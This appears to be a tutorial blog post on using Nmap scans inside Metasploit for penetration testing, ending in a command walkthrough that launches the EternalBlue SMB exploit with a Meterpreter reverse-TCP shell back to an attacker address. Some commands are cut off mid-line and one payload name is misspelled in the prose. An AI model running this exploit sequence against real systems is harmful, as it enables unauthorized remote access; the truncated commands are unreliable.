What is Metasploit and Nmap?

The Nmap Scanner module in Metasploit enables security professionals to leverage Nmap's robust network discovery capabilities directly within the Metasploit framework. By integrating Nmap, users can efficiently scan networks, identify devices, open ports, and services, and then immediately use Metasploit to assess vulnerabilities found during the scan.

This blog post explains how to use the Metasploit Nmap Scanner for penetration testing. It provides step-by-step guides on how to incorporate Nmap scans into Metasploit and exploit the identified vulnerabilities.

Understanding Nmap

Nmap is a tool that helps scan networks and find potential security issues. It identifies open ports, services, and devices connected to a network, making it easier to see what’s running and where. Security professionals use Nmap to map network structures, check for vulnerabilities, and understand how systems communicate.

It's simple to use and can quickly scan large networks. Security engineers can customize Nmap scans based on specific needs, whether it's a basic overview or a deep dive. With Nmap, they can can strengthen networks and identify threats early.

Understanding Metasploit

Metasploit is a powerful tool for testing and finding vulnerabilities in networks and applications. It helps security professionals simulate real-world cyberattacks to identify weak points. With Metasploit, it’s possible to discover security flaws, develop exploit code, and test systems for potential breaches.

Its framework supports a wide range of attacks, making it a favorite for penetration testing. The tool simplifies the process of finding and exploiting vulnerabilities, allowing security teams to improve defenses. By actively testing systems, Metasploit plays a crucial role in strengthening cybersecurity.

What is Metasploit Nmap Scanner?

The Metasploit Nmap Scanner is an auxiliary module within the Metasploit framework that integrates Nmap's network scanning capabilities directly into Metasploit. This module allows security engineers to perform network scans using Nmap from within Metasploit, providing a seamless experience for identifying and targeting vulnerabilities.

Features of Metasploit Nmap Scanner

The Metasploit Nmap Scanner offers several key features that enhance network scanning and vulnerability assessment capabilities:

Integration with Nmap

The security teams can directly run Nmap scans from within the Metasploit console. This integration allows them to use Nmap’s powerful network discovery features without leaving Metasploit. Combining both tools enhances the overall efficiency of vulnerability assessments. It streamlines the process of moving from scanning to exploitation seamlessly.

Convenience

Initiating Nmap scans within the Metasploit console saves time by avoiding the need to switch between tools. This integration allows security teams to manage the entire process in one place. It simplifies penetration testing by keeping all operations centralized. They can run scans, analyze results, and exploit vulnerabilities efficiently.

Enhanced Workflow

The Metasploit Nmap Scanner ensures a smooth transition from scanning to exploitation. Once security teams run the Nmap command, they can immediately act on the results within Metasploit. This integration helps streamline the workflow and boosts productivity, allowing a direct shift from network discovery to identifying and exploiting vulnerabilities.

Detailed Network Discovery

With the Nmap Scanner, security teams can gather detailed data about devices, open ports, and services on the network. This feature enables precise targeting for further security testing. Having detailed network information helps in identifying the most vulnerable entry points. It improves the effectiveness of penetration tests.

Automation and Scripting

Security teams can automate Nmap scans and integrate them into Metasploit scripts for repeatable tasks. This feature makes it easy to run scans across large environments without manual effort. Automating the scanning process boosts both accuracy and speed. It’s particularly useful for large-scale penetration tests in complex networks.

Using Metasploit Nmap Scanner to Scan Targets

Discover the power of integrated network scanning by leveraging the Metasploit Nmap Scanner module to enhance penetration testing capabilities.

Metasploit includes a module that allows security teams to integrate Nmap scans directly within the Metasploit framework. Here’s how to do it.

Start Metasploit

Launch the Metasploit Framework by using the msfconsole command. This starts the console where security teams can access all the Metasploit tools and modules.

Select the Nmap Scanner Module

Choose the Nmap Scanner module from Metasploit's auxiliary tools. This module allows the running of network scans using Nmap within the Metasploit framework.

Set the Target IP

Specify the IP address or range of the target system by setting the RHOSTS option. This tells the Nmap scanner which network or system to scan.

set

Run the Scan

Execute the Nmap scan by using the run command. This initiates the scanning process, providing details on the network, open ports, and services.

Example Commands

Execute these commands to perform a basic Nmap scan using Metasploit

msfconsole 
use auxiliary/scanner/portscan/nmap 
set RHOSTS 192

Importing Nmap Scan Results into Metasploit

After conducting a Nmap scan, import the results into Metasploit to analyze and exploit the discovered vulnerabilities.

Perform an Nmap Scan and Save the Results

Run an Nmap scan with -sV to detect service versions, and save the results in XML format using -oX. This step captures the scan data in a format Metasploit can import.

nmap -sV -oX

Start Metasploit

Launch Metasploit by running msfconsole, which opens the framework for further analysis of the scanned results.

Import the Nmap Results

Use the db_import command to import the Nmap scan results into Metasploit for further analysis. This loads the discovered hosts, services, and vulnerabilities into the Metasploit database.

Verify the Import

After importing, verify the results by reviewing the imported hosts and services using Metasploit commands like hosts or services to ensure you correctly load the scan data.

How to Identify Targets and Vulnerabilities?

Once the security teams have imported Nmap data into Metasploit, they can use it to identify potential targets and vulnerabilities.

List Hosts

Use the hosts command to list all the hosts that the scanning process has identified during the scanning process. This helps security engineers review which systems the network has discovered.

List Services on a Specific Host

To view the services running on a specific host, use the services -p [port_number] -R command. This shows the services that are active on the chosen port for that host.

services -p [port_number] -R

Search for Exploits Related to Discovered Services

After identifying services, search for exploits that target those services using the relevant Metasploit search commands. This step helps find vulnerabilities related to the services running on the hosts.

Full Penetration Test Using Both Nmap and Metasploit

Let's dive into the step-by-step process of conducting a comprehensive penetration test using the powerful combination of Nmap and Metasploit. Steps include:

Perform an Initial Nmap Scan

Run an Nmap scan with the -A option to gather detailed information about the target. Save the scan results in XML format for later use in Metasploit.

nmap -A -oX

Import Nmap Results into Metasploit

Start Metasploit by running msfconsole. Then, import the Nmap scan results using the db_import command to load the scan data into Metasploit.

Identify and Analyze Hosts

Use the hosts command to list all discovered hosts and the services command to view active services on those hosts. This helps security engineers analyze the scanned data for potential vulnerabilities.

Search and Select an Exploit

Search for vulnerabilities by using the search command with a specific vulnerability name. Once found, select the relevant exploit by using the use command with the exploit path.

Set Exploit Options and Run

Set the target IP with set RHOST, specify the payload with set PAYLOAD, and configure the IP address with set LHOST. Finally, run the exploit.

set RHOST [target_ip] 
set PAYLOAD [payload_name] 
set

Example Commands

Execute the following commands to perform a comprehensive penetration test using Nmap and Metasploit:

nmap -A -oX initial_scan.xml 192.168.1.1 
msfconsole 
db_import initial_scan.xml 
hosts 
services 
search smb 
use exploit/windows/smb/ms17_010_eternalblue 
set RHOST 192.168.1.1 
set PAYLOAD windows/x64/meterpreter/reverse_tcp 
set LHOST 192

This sequence of commands performs a penetration test by scanning a target, identifying vulnerabilities, and attempting an exploit. First, the nmap command scans the target IP (192.168.1.1), gathering information about services, operating systems, and potential vulnerabilities, and saving the results as an XML file (initial_scan.xml).

Next, the user starts the Metasploit Framework with msfconsole and imports the scan results using db_import initial_scan.xml to analyze the target further. The hosts and services commands display the discovered hosts and services from the scan.

The user then searches for vulnerabilities related to SMB with the search smb command and selects the EternalBlue to exploit by running use exploit/windows/smb/ms17_010_eternalblue. The user sets the target IP with set RHOST 192.168.1.1, and the payload is chosen as Meterpreter reverse TCP with set PAYLOAD windows/x64/interpreter/reverse_tcp.

The attacker's IP is specified with set LHOST 192.168.1.100, which sets up the reverse connection. Finally, the run command executes the exploit, attempting to gain unauthorized access to the target system and establish a remote connection.

Final Thoughts

Combining Nmap and Metasploit is a powerful strategy for conducting effective penetration tests. Nmap’s ability to scan networks, identify open ports, and uncover vulnerabilities, combined with Metasploit’s extensive exploit library, streamlines the process from discovery to exploitation. This integration not only enhances efficiency but also improves the depth of security assessments, making it easier to pinpoint weaknesses in the organization’s systems.